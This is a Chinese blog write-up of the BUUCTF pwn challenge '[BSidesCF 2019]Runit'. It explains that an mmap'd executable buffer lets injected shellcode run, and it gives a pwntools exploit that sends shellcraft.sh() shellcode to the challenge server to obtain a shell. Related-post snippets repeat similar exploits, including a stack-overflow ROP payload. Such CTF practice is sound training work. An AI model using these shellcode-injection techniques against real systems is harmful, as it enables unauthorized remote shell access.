[BUUCTF]PWN——[BSidesCF 2019]Runit(mmap+shellcode)

最新推荐文章于 2023-02-02 21:51:07 发布
最新推荐文章于 2023-02-02 21:51:07 发布
阅读量505 收藏 1
点赞数
分类专栏: BUUCTF刷题记录 PWN
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/mcmuyanga/article/details/115620948
版权

[BSidesCF 2019]Runit

  1. 例行检查,32位程序,开启了nx保护
    在这里插入图片描述
  2. 运行一下看看大概的情况
    在这里插入图片描述
  3. ida载入
    在这里插入图片描述
    虽然开了nx,但是buf用mmap映射了地址,可读可写可执行,直接传入shellcode,15行调用了buf,运行shellcode获取shell。

exp

from pwn import *

p=remote("node3.buuoj.cn",25055)

context.arch="i386"

shellcode=asm(shellcraft.sh())
p.sendline(shellcode)

p.interactive()

在这里插入图片描述
好久没有做到这种水题了。

Angel~Yan
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
[BSidesCF 2019]Runit
z1r0的博客
02-22 2179
[BSidesCF 2019]Runit 查看保护 写入getshell的shellcode即可。或者直接使用pwntools自带的shellcraft.sh from pwn import * context(arch='i386', os='linux', log_level='debug') file_name = './z1r0' debug = 1 if debug: r = remote('node4.buuoj.cn', 28471) else: r = proces
[BUUCTF]PWN——[BSidesCF 2019]Runit
BangSen1的博客
04-26 423
[BSidesCF 2019]Runit 例行检查 ,32位,开启NX保护 运行一下。 IDA打开,查看主函数。 buf用mmap映射了地址,可读可写可执行,直接传入shellcode,15行调用了buf,运行shellcode获取shell。 from pwn import * p=remote("node3.buuoj.cn",26059) context.arch="i386" shellcode=asm(shellcraft.sh()) p.sendline(shellcode) p.
buuoj Pwn writeup 141-145
yongbaoii的博客
05-28 220
141 jarvisoj_level6_x64 保护 142 suctf_2018_stack 保护 直接栈溢出到system就行。要注意ubuntu18,有个栈对齐。 from pwn import * r = remote('node3.buuoj.cn',28430) leave_ret = 0x400732 pop_rdi_ret = 0x4007a3 ret_addr = 0x0400677 payload = 'a' * (0x20 + 8) + p64(ret_addr) r.send
BUUCTF(pwn)[BSidesCF 2019]Runit
半岛铁盒的博客
04-12 225
from pwn import * p=remote("node3.buuoj.cn",25145) context.arch="i386" shellcode=asm(shellcraft.sh()) p.sendline(shellcode) p.interactive()
BUUCTF pwn wp 116 - 120
fa1c4的blog
03-06 400
[BSidesCF 2019]Runit [BSidesCF 2019]Runit$ file runit;checksec runit runit: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=fdd5061644dc69c2e4f2a0e98091901b4
buuctf pwn ubuntu20的自己搭建运行环境
11-15
pwn ubuntu20的自己搭建运行环境具体情参考https://blog.csdn.net/weixin_41748164/article/details/127874334
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
arm32 android版pwn-level6二进制文件+gdbserver+lldb+socat
最新发布
04-17
arm32 android版pwn-level6二进制文件+gdbserver+lldb+socat,文章pwn - 零基础ROP之Android ARM 32位篇(新修订)https://blog.csdn.net/tabactivity/article/details/137780714 全部资料文件。...0基础pwn
ciscn-2019-pwn
11-29
【标题】"ciscn-2019-pwn"是一个与网络安全竞赛相关的主题,尤其聚焦于"Pwn"类别,这通常指的是破解或利用程序漏洞来获取系统控制权的挑战。2019年的CISCN(中国互联网安全大会)可能是这个挑战的背景,它是一个汇集...
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018年pwnshellcode 变形shellcode练手题目,该题目主要是利用三个节点来注入shellcode,考验解题人对shellcode的熟悉程度。题解:https://blog.csdn.net/A951860555/article/details/110350773
buuctf-pwn write-ups (1)
CoLin的pwn小屋
05-01 401
buuctf-pwn 001-016题wp
PWN入门程序装载与虚拟内存 小白笔记
小白垃圾笔记2
02-02 368
CPU和硬件最终访问的都是物理内存,但是由于物理内存的一些机制,所以对于程序员不太友好。不同的功能区域被划分为不同的节。不同的功能区域根据读写权限划分为一个一个段,然后在虚拟内存中发挥作用。节根据读写权限不同被划分为不同的段,然后不同的段由系统完成映射。节视图是在磁盘中划分功能的,段试图是程序装载在内存中划分不同的读写执行权限的。整个4GB是这样一个结构,最上边的kernel(内核空间)是共享的。执行的时候,是将磁盘中的可执行文件(a.out)映像到内存中。这里的右边的图片中内存地址的单位是bits。
BUUCTF:[BSidesCF 2019]Kookie
末初的CSDN博客
03-30 2061
BUUCTF:[BSidesCF 2019]Kookie 提示我们使用admin账户登录,并且存在cookie/monster两个账户? 抓包添加Cookie: username=admin即可得到flag
BSidesSF 2019 部分writeup
Kr的博客
03-06 2424
forensics: table-tennis 给了一个流量包,使用wireshark打开,通过查找字符串和跟踪TCP数据流并没有发现什么,以我的水平,基本上到这里就结束了。 后面查看了其他人写的writeup,跟着复现了一下。 这个流量包中除了大量的加密的TLS和TCP数据流,还有一些ICMP数据包,发现里面有HTML数据。 这里要将这些HTML数据提取出来,照着大佬使用pyt...
2019年CTF3月比赛记录(一):BSidesSF 2019 CTF_Web部分题目writeup与重解
極品━═☆宏的博客
03-07 3958
2019年CTF比赛记录(一) 为了更好地学习CTF方面的相关知识,本着以赛促学的目的,决定自己报名参加一些2019年的CTF比赛,在比赛中去学其他的知识,帮助自己更好的学习Web方面的知识。限于个人能力有限,而且在时间上的限制,比赛中仅对自己当时看到的题目和解出的题目进行了解答。 比赛:BSidesSF 2019 CTF 时间:2019年3月4日至2019年3月5日 ...
pwn】记一道shellcode侧信道攻击
woodwhale的博客
10-16 4730
pwn】记一道shellcode侧信道攻击 前言 契机来源于K0nashi师傅给的一道题目,让我来写写shellcode,那当然是写啊! 分析 checksec之后发现保护全开,打开ida分析发现有沙箱,直接查看沙箱 可以使用read open,不能使用write,并且判断了A < 0x40000000。 再进入ida看看 先mmap一段可执行的chunk,然后可以写入0x18长度的shellcode,最后设立沙箱规则之后执行我们刚刚写入的shellcode。 那么一种新的思路就是侧信道攻击 简
Pwn】手动制作shellcode并测试
weixin_52553215的博客
05-26 444
1.测试shellcode的代码:shellcode_32.c 编译生成shellcode_test(注意取消NX保护,32、64位要区分) 2.shellcode_32.asm源码 3. (1)使用汇编器nasm把shellcode_32.asm编译成shellcode_32.o文件 (2)shellcode_32.o链接生成可执行文件shellcode_32_exe(可省略) (3)从 shellcode_32.o或shellcode_32_exe 提取code段,生成shell..
通过mmap&mprotect来绕过nx
qq_45595732的博客
03-24 1080
mmap mmap函数的用法 mmap将一个文档或者其它对象映射进内存。文档被映射到多个页上,如果文档的大小不是所有页的大小之和,最后一个页不被使用的空间将会清零。mmap在用户空间映射调用系统中作用很大。 头文档 <sys/mman.h> void* mmap(void* start,size_t length,int prot,int flags,int fd,off_t offset); 第一个参数:分配新内存的地址 第二个参数:新内存的长度(0x1000的倍数),长度单位是字节,不足一
Javris OJ - pwn level5(mmap和mprotect练习)(_libc_csu_init中的通用gedget的使用)
hanqdi_的博客
02-14 1745
pwn level5 这个题和level3-64的附件一样,level5要求不用system和execve,而是用mprotect和mmapmmap主要是将文件映射到一段内存去同时设置那段内存的属性可读可写或者是可执行,mprotect函数是将从addr开始的地址 ,长度位len的内存的访问权限。 可以这样做:利用shellcode,利用read函数把shellcode写入bss段,这里要求写入...
BUUCTF pwn rip
01-28
根据提供的引用内容,BUUCTF PWN-RIP是一个关于PWN技术的详解文章。文章中提到了64位的EIF文件中rbp寄存器的大小为8个字节。如果对这部分不太理解,可以阅读作者的另一篇关于PWN基础知识的文章。 BUUCTF PWN-RIP...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值